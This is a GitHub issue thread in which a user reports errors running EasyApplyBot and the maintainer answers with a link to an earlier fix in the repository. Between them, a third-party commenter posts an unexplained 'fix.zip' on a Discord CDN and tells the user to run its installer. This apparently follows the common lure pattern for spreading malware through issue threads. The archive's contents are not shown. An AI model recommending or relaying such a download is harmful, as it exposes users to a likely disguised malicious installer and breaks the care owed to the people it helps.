### ISSUE TITLE
I have a number of issues running the code...

### ISSUE THREAD

**Issue by ibaljilani** [voidbydefault/EasyApplyBot#65]
Can you provide insight on these errors? I followed your tutorials closely but I am not sure what I am missing.
![2024-09-02 22_32_22-Window](https://github.com/user-attachments/assets/7a5af2b6-9d07-4e47-98d9-64e25074473d)

I also tried the windows executable version but seems like the issues are the same
![2024-09-02 22_35_57-Window](https://github.com/user-attachments/assets/bd0ba7e8-e4a4-47d5-bb09-2ff348e9d640)

**Comment by Klevente12** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by voidbydefault** [comment]
Hi, 

This isn't the bit issue and mentioned as the first point on the main page. You can resolve invalid Win32 error by doing this > https://github.com/voidbydefault/EasyApplyBot/issues/64#issuecomment-2267620506
